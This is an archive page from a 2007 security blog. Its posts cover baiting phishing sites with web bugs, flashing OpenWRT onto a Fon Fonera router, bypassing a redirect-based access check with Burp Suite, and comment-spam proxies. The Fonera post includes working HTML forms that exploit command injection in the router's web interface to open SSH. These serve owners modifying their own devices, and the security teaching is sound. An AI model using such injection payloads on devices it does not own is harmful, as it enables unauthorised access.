Exploiting Phishers' Harvesting With Web Bugs

 analysis, exploitation, phishing, vulnerabilities, web  2 Responses »
Apr 302007
 

I’ve posted before about how phishers and others that are on the “other” side of computer security ironically do not practice very good coding techniques. To borrow one of Dave Aitel’s ideas from a few weeks ago, hackers often do not practice very good operational security, since it’s not a good fit with their aggressive nature. The same idea applies equally well (if not better) to phishers. Phishing is a numbers-game for those involved, and when the choice in front of the phishers is between secure software and processes, or spending that time pushing out more emails and sites, the phishers will always pick the latter. It’s hard for them to justify the additional time, when that time could be spent making more money.

A while back, I came up with and experimented with a technique for gaining more information about phishers’ operations. The idea is based off of web bugs that are normally used to track users through emails or web site visits. A classic example of a web bug is an HTML email, containing a reference to 1×1 transparent .GIF file located on the senders’ web server. If the filename of that image is unique to that email, and the recipient’s email client renders the HTML and retrieves the image, then the sender can examine their web server logs to see if and when the recipient opened the email. Not only that, but the web server logs will also indicate the IP address, and possibly some information about the email client or web browser being used.

To apply this to phishing, I simply decided to stuff HTML image tags and links and such into phishing web sites’ forms. The idea is, if the data is being logged to or emailed to any type of system that renders the HTML, there is the possibility that the phishers will inadvertently retrieve the web bugs along with their data. At the very least, they may become curious about the URLs showing up in their data and try to see what’s there. On a lark, I created unique images and stuffed web bugs and links into a few different phishing sites the morning that I came up with the idea. I wound up getting hits back for some of them. So it was a promising idea.

I have passed the idea along to a masters degree student here who is currently working on refining it and collecting larger amounts of data for his thesis. Along the way, I co-authored a paper with him on the topic. He’s working on automating it and such now, however I still play with the idea from time to time.

Last night I received a phishing email that targeted Runescape (an MMORPG) players. This outside of the norm of what I usually receive, so I figured it would be fun to try baiting it with some web bugs. I set up a unique-URL image (a small McGrew Security logo, lol), and php redirecting page, and then set about baiting the site. The following images show the forms on this Runescape phishing site:

Maybe they didn’t design that with Firefox in mind. As I said, phishers can be very sloppy ;) . At any rate, to stuff the appropriate image and link tags in, we can’t simply use the stock web browser, as they have the forms set to limit the number of characters input into each field (chances are, their server-side code doesn’t check these bounds). We wouldn’t be able to fit the whole tag and URL into them normally. There are extensions for firefox that allow you to remove such restrictions in a page, but since I’ve already covered the Burp Suite proxy in a previous blog entry, I’ll just use it:

The same technique is applied to the second page’s worth of forms, alternating between putting an image tag that will render automatically (if all goes well) and links (which a curious phisher might decide to click on). You then pass it all along through Burp, and sit back and wait, grepping through your web logs for someone accessing those URLs.

About 3 hours later, I had a hit!


82.135.214.208 - - [30/Apr/2007:02:22:25 -0400] "GET /XXXXXXXXXXXXXX HTTP/1.1" 200 2354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; MEGAUPLOAD 1.0)"

So, from this alone we get a few bits of information:

  • IP Address – (Where is it? Is it a proxy? More on this in a bit, read on!)
  • Date – (Response time)
  • User Agent – IE 6 on a Windows XP machine. Apparently they either have a MegaUpload account or have added “MEGAUPLOAD 1.0″ to their user agent string in order to make MegaUpload think they have an account. Either way this unique bit makes it more likely that I’d be able to pick this host out of the logs if it were to come back to this site as another IP address.

Back to the IP address, it reverse DNS’s to “82-135-214-208.ip.zebra.lt”, and is in Lithuania. If you do a google search for the IP address in quotes (a similar technique as what my YaSweep/GooSweep app uses for larger ranges), you’ll see that it has been used for phishing and spamming in the past. Project Honeypot has a very informative page on it. Looking back at the email that I received originally, it turns out it was sent from the same IP address.

Poking at the host a bit indicates that it’s likely a Linux machine, with what appears to be a tcpwrapped proxy. The Windows user agent coming from a Linux machine also indicates that it is a proxy, and it’s apparently not an open one. It’s a machine that is, one way or another, under the control of the phisher and used to anonymize their actions. That’s at least something this attacker did well for themselves to do. Many phishers view their resulting data on their own computers, unproxied, and will give away their actual workstation’s IP address, if their procedure is vulnerable to this kind of attack.

So there you have it! Information gathering on phishers/blackhats. It’s a fun concept. It would be very interesting to extend it to include javascript, and other attacks on the different ways phishing data is processed.

 Posted by wesley at 1:35 pm

A couple more for your RSS reader

 links  No Responses »
Apr 252007
 

I’m not exactly sure how I’ve gone this far without having these two blogs in my reader. All you have to do is look over the past few posts on both of them to realize that it’s quality stuff. There are feeds that I’ll just click on to mark them as read, and then there are some that I make sure to take in every word. These are more of the latter.

  • Matasano Chargen – Check out the latest Quicktime stuff
  • Information Security Sell Out – I’ll just paste in the description here: “The truth and nothing but the truth about an industry full of snake oil salesmen, pimps, and whores. Yes, I am talking about Information Security.” Now you know you want to read that.
 Posted by wesley at 7:02 pm

OpenWRT on the Fon Fonera

 hardware, network, Uncategorized, wireless  9 Responses »
Apr 242007
 

UPDATE : Brett Hoff and Russell Butturini have made some notes of their own to go with these notes, to clarify some of the things that have changed in newer versions of Kamikaze and the Fon, gotchas with non-Apache webservers, and a few other things you might have problems with. Those notes are available here.

I’m very proud of my new toy. These Fon Fonera routers are really what the security geek ordered, and they’re usually pretty cheap on ebay. Check out this guy’s picture of one next to his mouse. They’re tiny! It can be hard enough to find a WRT54G duct-taped up behind a cubicle wall, so imagine where you could put that thing! It’s also handy to have something like this in your laptop bag to set up wireless networks out in the field, bridge a wireless network over to a wired, wireless honeypots, or any number of other strange configurations you might want to set up.

I’ll probably cover some interesting things you can do with routers like this in future posts, but for now, we need to get this thing into useful shape. By default, the Fonera firmware (which is based on OpenWRT) sets up private and public SSIDs, phones home to the folks at Fon, and other things undesirable for our purposes. I have replaced the Fonera’s default firmware with the latest snapshot of OpenWRT, and I tried to take some notes on the process. Hopefully if you get your hands on one of these, you can follow along:

Big warning: Don’t connect the Fon up to the Internet at all until you finish getting a fresh install of OpenWRT on it. It will probably update itself with new firmware from Fon and lock you out of having any fun at all with it.

Through this, the following sites were very helpful. A lot of the steps are pinched and adapted from them:

The first order of business is to figure out what version of the firmware I have. The default firmware’s status page helps with this:

We don’t want to turn it into a useless brick in the process of flashing it, and we’re in luck, because the device uses an implementation of RedBoot. To make things easy, we want to enable RedBoot’s ability to listen on the wired Ethernet side for a telnet session on boot. That way, if we screw up, we can always go back into RedBoot and fix it. We’ll also flash it in RedBoot.

To enable RedBoot, we need to get a shell on the default firmware. There’s not an SSH server listening by default, but we’re going to turn one on through a command injection exploit on the web interface. It’s pretty trivial, and it works well on the 0.7.1-r1 version. If you have a newer version, you’ll want to check around to see how to revert it (it might be as simple as holding down the reset button to reset it back to 0.7.1-r1), or if there are new exploits.

You’ll create two html files that submit the right input to the web interface. Go ahead and connect to the Fon’s private network SSID “MyPlace”. First, we want to set up iptables to allow traffic on the SSH port (just save this HTML to your hard drive in a .html file, view it in your web browser, and click submit):


<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>

</body>
</html>

Now, we want to actually start the dropbear SSH server:


<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/etc/init.d/dropbear)" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>

</body>
</html>

You should be able to SSH into your Fon on port 22 of its IP address (192.168.10.1). You’ll want to set up dropbear to run whenever you reboot the Fon, too:

weasel@hacktop:~$ ssh root@192.168.10.1
The authenticity of host '192.168.10.1 (192.168.10.1)' can't be established.
RSA key fingerprint is 69:52:42:17:fd:b0:97:1a:5f:33:8d:5a:f0:5b:8a:dc.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.10.1' (RSA) to the list of known hosts.
root@192.168.10.1's password:

BusyBox v1.1.3 (2006.11.21-19:49+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

 _______  _______  _______
|   ____||       ||   _   |
|   ____||   -   ||  | |  |
|   |    |_______||__| |__|
|___|

 Fonera Firmware (Version 0.7.1 rev 1) -------------
  *
  * Based on OpenWrt - http://openwrt.org
  * Powered by FON - http://www.fon.com
 ---------------------------------------------------
root@OpenWrt:~# mv /etc/init.d/dropbear /etc/init.d/S50dropbear

Also, use vi to uncomment the two lines in /etc/firewall.user that allow connections on port 22.

To enable RedBoot over Ethernet, you’ll need a modified kernel and a new RedBoot config. For convenience, I set up a web server on the computer I configured my Fon on, downloaded those files, and placed them in the root directory. From here on out, I’ll assume you’ve done the same, know what IP address it’s listening on, and will substitute it in as needed.

Next, get the modified kernel and RedBoot config onto your Fon and apply them:

root@OpenWrt:~# wget http://192.168.10.183/out.hex
Connecting to 192.168.10.183[192.168.10.183]:80
out.hex              100% |*******************************************************|  4096       00:00 ETA
root@OpenWrt:~# wget http://192.168.10.183/openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma
Connecting to 192.168.10.183[192.168.10.183]:80
openwrt-ar531x-2.4-v 100% |*******************************************************|   512 KB    00:00 ETA
root@OpenWrt:~# mtd -e vmlinux.bin.l7 write openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma vmlinux.bin.l7
Unlocking vmlinux.bin.l7 ...
Erasing vmlinux.bin.l7 ...
Writing from openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma to vmlinux.bin.l7 ...  [w]
root@OpenWrt:~# reboot

After it finishes rebooting, SSH in and continue…

root@OpenWrt:~# mtd -e "RedBoot config" write out.hex "RedBoot config"
Unlocking RedBoot config ...
Erasing RedBoot config ...
Writing from out.hex to RedBoot config ...  [w]

Once that finishes, your Fon probably won’t reboot correctly. No big deal. We’ll be going into RedBoot to flash the new OpenWRT. Redboot listens on port 9000 of 192.168.1.254 for about ten seconds upon boot before it moves on. You have ten seconds to send Ctrl-C on this port to stop it and allow you to interact with RedBoot. It’s easiest to just use this script, redboot.pl, to connect to RedBoot. Leave it running on the computer you’re configuring this from, plug in the router, and it’ll connect up for you and leave you at a RedBoot prompt.

weasel@hacktop:~$ ./redboot.pl 192.168.1.254

Snipped out a bunch of “unreachable” messages

192.168.1.254 is unreachable
192.168.1.254 is alive
-> == Executing boot script in 7.080 seconds - enter ^C to abort
<- ^C
Trying 192.168.1.254...
Connected to 192.168.1.254.
Escape character is '^]'.
RedBoot>

Once we have RedBoot working, we can flash the Fon with the latest OpenWRT. Go to the OpenWRT download site here, download “openwrt-atheros-2.6-vmlinux.lzma” and “openwrt-atheros-2.6-root.jffs2-64k”, and then place them in the root directory of the web server you’re running.

Connect up to RedBoot again, and use the following commands to initialize the memory on the Fon, configure the network settings (with your own computer/web server instead of 192.168.1.5), and write OpenWRT to the Fon. Note that these commands take some time, especially when you write the root filesystem. Play some Sudoku or something:

RedBoot> ip_address -l 192.168.1.254/24 -h 192.168.1.5
IP: 192.168.1.254/255.255.255.0, Gateway: 0.0.0.0
Default server: 192.168.1.5
RedBoot> fis init
About to initialize [format] FLASH image system - continue (y/n)? y
*** Initialize FLASH Image System
... Erase from 0xa87e0000-0xa87f0000: .
... Program from 0x80ff0000-0x81000000 at 0xa87e0000: .
RedBoot> load -r -v -b 0x80040450 /openwrt-atheros-2.6-root.jffs2-64k -m HTTP
-
Raw file loaded 0x80040450-0x801e044f, assumed entry at 0x80040450
RedBoot> fis create -b 0x80040450 -f 0xA8030000 -l 0x00700000 -e 0x00000000 rootfs
... Erase from 0xa8030000-0xa8730000: ................................................................................................................
... Program from 0x80040450-0x80740450 at 0xa8030000: ................................................................................................................
... Erase from 0xa87e0000-0xa87f0000: .
... Program from 0x80ff0000-0x81000000 at 0xa87e0000: .
RedBoot> load -r -v -b %{FREEMEMLO} /openwrt-atheros-2.6-vmlinux.lzma -m HTTP
-
Raw file loaded 0x80040800-0x800f07ff, assumed entry at 0x80040800
RedBoot> fis create -r 0x80041000 -e 0x80041000 vmlinux.bin.l7
... Erase from 0xa8730000-0xa87e0000: ...........
... Program from 0x80040800-0x800f0800 at 0xa8730000: ...........
... Erase from 0xa87e0000-0xa87f0000: .
... Program from 0x80ff0000-0x81000000 at 0xa87e0000: .
RedBoot> fis load -l vmlinux.bin.l7
Image loaded from 0x80041000-0x80289086
RedBoot> exec

(Edit: Note that for the line “fis create -b 0×80040450 -f 0xA8030000 -l 0×00700000 -e 0×00000000 rootfs”, you may need to use “-l 0x006F0000″ instead of “-l 00700000″, since the Kamikaze kernel has apparently grown since I wrote this. Thanks to DmnHunter on #pauldotcom for the tip!)

The last command starts up the new system. Give it some time to boot up, and it should show up on 192.168.1.1. Now, you can telnet in, and set a password if you like (which will automatically set up an ssh server for you).

Congratulations! If it worked as well for you as it did for me, you’re running a fresh install of OpenWRT on your Fon. You might want to start reading up on the OpenWRT Wiki about how to configure the Kamikaze version of OpenWRT. I’ll also post some scripts, hints, and tricks to this blog as I come up with them (especially when it’s of interest to the security community).

 Posted by wesley at 4:25 pm

Fun: Random SpinRite Testimonial Generator

 fun  No Responses »
Apr 192007
 

If you’ve ever listened to Security Now!, this should give you a case of the chuckles:

Random SpinRite Testimonial Generator

 Posted by wesley at 8:11 pm

Using the Burp Suite to bypass (weird) access controls

 analysis, exploitation, vulnerabilities, web  12 Responses »
Apr 192007
 

You might recall that a month ago, I gave a lecture on web security to the “Distributed Client-Server Programming” class taught here at Mississippi State University. The goal was to give them a heads-up on what mistakes are commonly made by web developers, so they could try and avoid them while developing their final group projects. Yesterday and today, I have been sitting in on their final presentations, and (playfully) tinkering with their sites as they demonstrate them. They’ve definitely tried hard to work security into their projects, and it’s been interesting to play around and show off how things can go wrong.

They’re definitely learning a lot too, because one of the students actually pointed out the vulnerability I’m going to describe here before I found it :) . I thought it was a neat opportunity to show off how to attack bad access controls, so I decided to make this post about it as a tutorial on how to use PortSwigger’s excellent Burp Suite to bypass things like this. I’ve even set up a page on my site here that you can try it on :) .

The original student team’s project had two interfaces, the user’s interface, at $baseURL, and an admin interface at $baseURL/admin . When the user logged in, it would send them to the appropriate interface, based on the “admin” flag the user set in the database. To prevent normal users from going into the admin interface, the following code is used for all admin pages:

This lets the web browser know that it should head back to $baseURL. The problem is, that the php code/page just keeps on going: parsing parameters, sending the interface, and all the things that it would do for a real admin. A well-behaved web browser honors the “location:” in the header, however, and doesn’t render anything below. Unfortunately attackers aren’t well-behaved…

To show off how to beat this, I’ve set up this page for you to play with. Open it up in a new tab, and you’ll see that it uses “location:” to send you straight back to the root page of this site. Here’s the code:

Now, the page does get to the “You’re not supposed to be here, lol” part, it simply doesn’t get a chance to render. To see it, we’ll have to take the “location:” part of the header out. We’ll do this with Burp Suite, so go ahead and get a Java VM on your machine if you haven’t already, download Burp, and get it running.

Burp acts as a web proxy, and allows you to intercept requests and responses, and then modify them before they’re sent along to the server or client. This is very handy stuff for attacking web applications. Once you have it up and running, change your web browser’s proxy settings to use it:

Burp is already set up to intercept client requests, but you’ll need to turn on the functionality for intercepting server responses in the “Options” tab under “proxy”, in the “server responses” section. Check the “intercept if:” box here:

Now, go back to the “intercept” tab, and open this in a new tab again. Your web browser will just sit there (if you’ve got it all set up right), while the request has been intercepted by Burp:

Go ahead and click “forward” here. In this case, there’s not much to see in the request, but a lot of the times when using Burp on web apps, you’ll be changing things before forwarding along. Now, it should intercept the server’s response:

Notice that the whole page got sent (complete with the typo on the closing h tag that I just noticed, lol oh well). Also notice, in the header, the line “Location: http://mcgrewsecurity.com/”. This is what’s making your browser jump to another location, rather than display the page, so just highlight it and cut it out. The response should look like this after your modification:

Now, go ahead and click “forward”, and it’ll send the page along to your browser. There you go :) :

Note that even though we had to do some trickery to get the page to display, if it actually processed any POST/GET parameters (as admin pages tend to do), it would do so in this case, regardless of whether or not the browser redirected. All the attacker would have to do is supply the correct parameters. Burp makes things like this a breeze :) .

I’ve never personally seen a system that did access control like this, but when this was pointed out to me, I thought it was interesting and educational enough to share :) . Definitely something to look out for, and maybe if you haven’t used the Burp Suite before, you’ve got a nice new tool to play around with.

 Posted by wesley at 1:47 pm

Fresh proxies, delivered straight to your doorstep

 network, spam, web  No Responses »
Apr 152007
 

Several times a day, I get notification that there are new comments on this blog, waiting for moderator approval…

…unfortunately, they’re not adoring fans :) . It’s always “comment-spam”, trying hard to place some advertising on my site for refinancing of mortgages, various pills, porn, and who-knows-what-else. It’s typically from many different IP addresses, so the actual spammers are almost certainly hiding their identity. Today, I figured I’d take a closer look.

I had assumed that I’d find a set of computers, of similar operating systems and configurations, as part of a botnet being used for this sort of thing. After seeing the results and giving it some thought, it’s obvious that a botnet would be unnecessary for this sort of endeavor. There are plenty of machines out there ready to do one’s bidding for comment spam, without having to build an elaborate net.

What I have found is a lot of machines running wide open web proxies, on common ports such as 3128 and 8080. Running the IP’s through GooSweep shows that these specific proxies are on many lists of proxies, blacklists, not to mention tons of blog comments. The spammers are keeping the proxies busy, and it’s amazing that some of them have been up as long as they have (on the order of weeks).

Most script-kiddies find proxies like this by scanning ranges on common ports. Me? I get them delivered by email on a daily basis.

 Posted by wesley at 8:54 pm

Phishers use old stuff too sometimes…

 phishing, vulnerabilities, web  No Responses »
Apr 112007
 

Well hello there Andrew.

I’ve been away from computers for an extended weekend, so I’m pulling this from some stuff I was looking at late last week. It’s amazing how many of these old mailto scripts are still hanging around. Makes you want to poke around and see if phf is sitting there too.

 Posted by wesley at 4:35 pm

Things to watch out for…

 ruby  No Responses »
Apr 052007
 

…guys in range of your wireless network with laptop stickers like this (click for full resolution):

The above shot was taken of me at last night’s Linux users’ group meeting, and Gimp’d up this afternoon (slow day). I was mostly ignoring the presentation (because it was “What is Linux”, not because of bad presentation skills. Greg did a great job.). Instead I was trying to figure out libpcap-ruby. I’m new to Ruby, so I just sort of skimmed the pickaxe book and dove right into writing a sniffer. Personally I don’t really understand why a packet’s .raw_data member wouldn’t contain the headers, but not the TCP payload, but I’m not too concerned with it since I finally noticed the .tcp_data member.

I think it’s going take some tweaking and getting-used-to before I really dig irb as much as I like ipython. I often use ipython as my interface when I’m using python code I’ve written. Rather than having a set of scripts that I edit to do whatever I need, I tend to write python functions for tasks, load them up in ipython, and use them interactively. That way I can shuffle the data around in a more ad-hoc manner, stuff it out to a file when I need to, and basically just play the part of a script myself. It looks like irb is what I’ll be doing the same activities in with Ruby, but I’m just not as good at it yet :) .

 Posted by wesley at 3:52 pm

Full disclosure… of procedure?

 vulnerabilities  2 Responses »
Apr 032007
 

I’m taking a graduate seminar-type course on secure coding currently, and as part of this class, we are supposed to write a term paper on a topic of our choice, relating in some way to security, coding, testing, etc. Often, when given the choice of topic, I’ll use it as an excuse to do some reading or research that I had been meaning to do earlier but simply hadn’t justified the time for. That’s what I did this time, and I chose to write about fuzzing (the process of discovering vulnerabilities by automatically crafting random inputs for it and logging what happened when it breaks).

It’s a very interesting topic and I have enjoyed reading some of the papers and looking at the different tools that are available. In my outline however, I wanted to have a section where I discussed some actual vulnerabilities that have been discovered through the use of fuzzing. The problem is, there seems to be a discrepancy: there is a large amount of discussion about fuzzing out there in the security community, even detailing methods of fuzzing specific protocols and applications, however there is relatively little talk of actual vulnerabilities found using fuzzing. I know that a lot of recent vulnerabilities have probably been found using fuzzing techniques, but it’s hard to quantify or pull out good examples when all of the advisories out there make no mention of the methods they used to discover the vulnerability.

So we have full disclosure of a vulnerability’s technical details and impact, but no disclosure of how the researcher got to that point.

I’m not saying that this is something that researchers should feel morally obliged to do (it’s not), and I understand that it would take considerable effort to document the procedure and present it in a useful form. Not to mention cases where internal/proprietary tools are used. Wouldn’t it be nice every once in a while to see it, though?

Even though they’ve done great work and don’t deserve to be picked on, I’m going to pick on Determina Security Research for a moment as an example. They recently published a wonderful write-up on the recent .ANI vulnerability. Now imagine how fascinating it would be to be able to read and follow the process or story of how they originally found this vulnerability. It has to be more engaging than the current story: “Vendor notification: Dec 20, 2006″. For my own purposes today, reading over this advisory, it looks like it could very well have been the sort of thing a fuzzer could find. It would have been a slam-dunk for my paper if they’d have come out and said something along the lines “…using the FooFuzz Framework…”. As it stands now, maybe they did, maybe they didn’t :) .

Again, not to pick on them or call them out, as they actually give presentations at conferences, release tools and advisories for the community. I’m just saying that behind every vulnerability discovery is a story that at least some are going to find very interesting, and it’d be nice to see someone tell that story once in a while.

 Posted by wesley at 4:16 pm
© 2012 McGrew Security Suffusion theme by Sayontan Sinha